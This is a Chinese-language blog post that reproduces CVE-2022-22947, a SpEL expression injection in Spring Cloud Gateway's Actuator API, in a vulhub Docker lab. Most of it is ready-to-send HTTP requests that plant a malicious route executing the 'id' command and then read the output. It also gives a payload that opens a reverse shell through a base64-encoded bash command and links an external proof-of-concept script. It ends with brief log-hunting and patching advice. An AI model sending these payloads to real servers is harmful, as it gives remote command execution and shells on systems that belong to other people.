大柚子

这世界不过如此

概述

Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。

影响范围

3.1.0

3.0.0至3.0.6

3.0.0之前的版本

环境搭建

这里使用vulhub的环境,一键搭建

[root@VM-0-15-centos CVE-2022-22947]# docker-compose up -d
Starting cve202222947_spring_1 ... done
[root@VM-0-15-centos CVE-2022-22947]# docker ps
CONTAINER ID        IMAGE                               COMMAND                  CREATED             STATUS              PORTS                      NAMES
b02f988b0d4a        vulhub/spring-cloud-gateway:3.1.0   "java -Djava.securit…"   7 days ago          Up 9 seconds        0.0.0.0:8070->8080/tcp     cve202222947_spring_1

访问8070端口

漏洞复现

以POST方法请求“/actuator/gateway/routes/pentest,并构建如下数据包,用以创建一条恶意路由


POST /actuator/gateway/routes/testtest HTTP/1.1
Host: yourIP:8070
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "pentest",
  "filters": [
    {
      "name": "AddResponseHeader",
      "args": {
        "name": "X-Request-Foo",
        "": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(getRuntime().exec(new String[]{"id"}).getInputStream()))}"
      },
      "uri": "http://httpbin.org/get",
      "predicates": [
        {
          "name": "Method",
          "args": {
            "_key_0": "GET"
          }
        },
        {
          "name": "Path",
          "args": {
            "_key_0": "/pentest"
          }
        }
      ]
    }
  ]
}

id 字段指定新路由的名称,必须全局唯一。
filters 字段给这条路由指定若干个过滤器。过滤器用于对请求和响应进行修改。
name 字段指定要添加的过滤器,这里添加了一个 AddResponseHeader 过滤器,用于 gateway 给客户端返回响应之前添加一个响应头。
args.name 字段指定要添加的响应头。
args.value 字段指定响应头的值。这里的值是要执行的 SpEL 表达式,用于执行 id 命令。注意需要将命令输出结尾的换行符去掉,否则过滤器执行时会抛出异常说「响应头的值不能以 \r 或 \n 结尾」。
uri 字段指定将客户端请求转发到 http://example.com。
predicates 字段指定匹配此路由的条件。这里指定了两个条件,一个是请求的方法为 GET,一个是请求的 URI 为 /pentest。(我这里后续未指定这个值)

手工探测漏洞

首先发送如下数据包添加一个包含恶意SpEL表达式的路由:


POST /actuator/gateway/routes/testtest HTTP/1.1
Host: yourIP:8070
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 329

{
  "id": "testtest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"id"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

然后,发送如下数据包应用刚添加的路由。这个数据包将触发SpEL表达式的执行:

发送如下数据包即可查看执行结果:


GET /actuator/gateway/routes/testtest HTTP/1.1
Host: yourIP:8070
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

最后,发送如下数据包清理现场,删除所添加的路由

再次刷新路由

请求原先的路由,会提示找不到

获取shell

上述第一步构造数据包


"#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec("bash -c {echo,<strong><em>此处为反弹命令的base64编码</em></strong>}|{base64,-d}|{bash,-i}").getInputStream()))}"

后续步骤一样,刷新路由,访问路由(404),删除路由,刷新路由

github上也有完整的脚本,这里引用的是:https://github.com/chaosec2021/CVE-2022-22947-POC

应急排查

如之前的spring插件一样,spring本身是不会记录访问日志的,故无访问日志可查,如果有中间设备保留有web日志记录,可探测关键字”/autuator/gateway/routes””/autuator/gateway/routes/refresh”和”DELETE“请求包。

加固建议

下载官方安全版本

禁用actuator gateway

参考来源

https://www.anquanke.com/post/id/269795

Print Friendly, PDF & Email

发表回复

您的电子邮箱地址不会被公开。